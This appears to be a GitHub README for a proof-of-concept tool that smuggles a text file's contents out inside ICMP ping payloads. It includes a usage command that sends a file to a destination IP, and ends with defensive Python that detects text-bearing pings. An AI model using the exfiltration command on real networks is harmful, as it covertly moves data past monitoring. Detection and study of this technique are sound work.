hercules261188 / ping_smuggler

Concept script to demonstrate how to exfiltrate data inside of ping packets

Ping Smuggler

Overview

Disclaimer: this tool is for educational purposes only

This tool is a set of scripts that send the contents of a text file inside ICMP payloads. This project consists of two Python scripts:

  1. Ping Generator (ping_generator.py): This script generates ICMP ping messages, embedding the contents of a text file into the ICMP payload and sends them to a specified destination.
  2. Ping Parser (ping_parser.py): This script reads a PCAP file containing ICMP messages generated by the Ping Generator and extracts the text payload from these messages, converting it into plain text.

Requirements

  1. Python: Python 3.x is required to run these scripts.
  2. Operating System: The Ping Generator script is designed for Linux systems due to its dependency on scapy, which works best on Linux.
  3. Scapy: The Ping Generator script uses the scapy library for packet creation and manipulation. Installation: Install scapy using pip:
pip install scapy

Note: scapy requires administrative (sudo) privileges to send packets.

  4. tshark: The ICMP Payload Parser script uses tshark (via pyshark) for parsing PCAP files. Installation:
  • Linux: Install using your package manager, e.g., sudo apt-get install tshark.
  • Windows: Download and install Wireshark, which includes tshark, from Wireshark's official website. Ensure tshark is in your system's PATH.
  5. Pyshark: The ICMP Payload Parser script requires pyshark, a Python wrapper for tshark. Installation: Install pyshark using pip:
pip install pyshark

Usage

Ping Generator (ping_generator.py):

Usage: sudo python3 ping_generator.py [destination IP] [file path]

Sends ICMP packets containing text from the specified file to the given destination IP. Requires administrative privileges to execute.

ICMP Payload Parser (ping_parser.py):

Usage: python3 ping_parser.py path_to_your_pcap_file.pcap

Parses the specified PCAP file and extracts ASCII text from ICMP payloads. Ensure the PCAP file contains ICMP packets generated by the Ping Generator script.

Notes

  • These scripts are for educational and testing purposes only. Ensure you have permission to send and capture ICMP packets in your network.
  • The Ping Generator script's functionality is network-dependent and may not work as expected in all environments, especially those with ICMP restrictions.
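For anyone monitoring a network where this is tested: echo requests that carry file text do not look like the data stock ping utilities send. The sketch below is an added example, not code from this repository; it flags IPv4 echo requests whose payload is mostly printable text and matches neither the Windows ping alphabet cycle nor the Linux iputils counter fill. The function names, the 0.9 threshold and the sample addresses and payloads are assumptions made for illustration.

```python
import socket
import struct
from collections import Counter

WIN_CYCLE = b"abcdefghijklmnopqrstuvw"  # Windows ping repeats a..w as its data

def echo_request(ip_packet):
    """Return (source IP, payload) for an IPv4 ICMP echo request, else None."""
    if len(ip_packet) < 20 or ip_packet[0] >> 4 != 4 or ip_packet[9] != 1:
        return None
    ihl = (ip_packet[0] & 0x0F) * 4
    if ihl < 20 or len(ip_packet) < ihl + 8 or ip_packet[ihl:ihl + 2] != b"\x08\x00":
        return None
    return socket.inet_ntoa(ip_packet[12:16]), ip_packet[ihl + 8:]

def is_default_ping(payload):
    """True for empty data, the Windows alphabet cycle, or the iputils counter fill."""
    n = len(payload)
    if n == 0 or payload == (WIN_CYCLE * (n // len(WIN_CYCLE) + 1))[:n]:
        return True
    # iputils ping writes a timestamp (8 or 16 bytes), then data[i] = i.
    return any(n > ts and all(payload[i] == i & 0xFF for i in range(ts, n))
               for ts in (8, 16))

def is_texty(payload, threshold=0.9):
    """True when at least `threshold` of the bytes are printable ASCII or whitespace."""
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in payload)
    return bool(payload) and printable / len(payload) >= threshold

def suspicious_sources(packets):
    """Count, per source IP, echo requests carrying non-default text payloads."""
    hits = Counter()
    for pkt in packets:
        parsed = echo_request(pkt)
        if parsed and not is_default_ping(parsed[1]) and is_texty(parsed[1]):
            hits[parsed[0]] += 1
    return hits

def build_echo(src, payload):
    """Constructed sample packet; checksums are zero because the parser ignores them."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 0, 0, 64, 1, 0,
                     socket.inet_aton(src), socket.inet_aton("192.0.2.1"))
    return ip + struct.pack("!BBHHH", 8, 0, 0, 1, 1) + payload

# Constructed sample traffic: two ordinary pings, then two text-bearing ones.
SAMPLE = [build_echo("10.0.0.5", WIN_CYCLE + b"abcdefghi"),
          build_echo("10.0.0.6", bytes(16) + bytes(range(16, 56))),
          build_echo("10.0.0.7", b"user=alice;dept=finance\n"),
          build_echo("10.0.0.7", b"quarterly totals: 1,204,880\n")]
```

Calling suspicious_sources(SAMPLE) counts two flagged packets for 10.0.0.7 and none for the other two hosts. The same check can be fed raw IP packets read from a capture.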
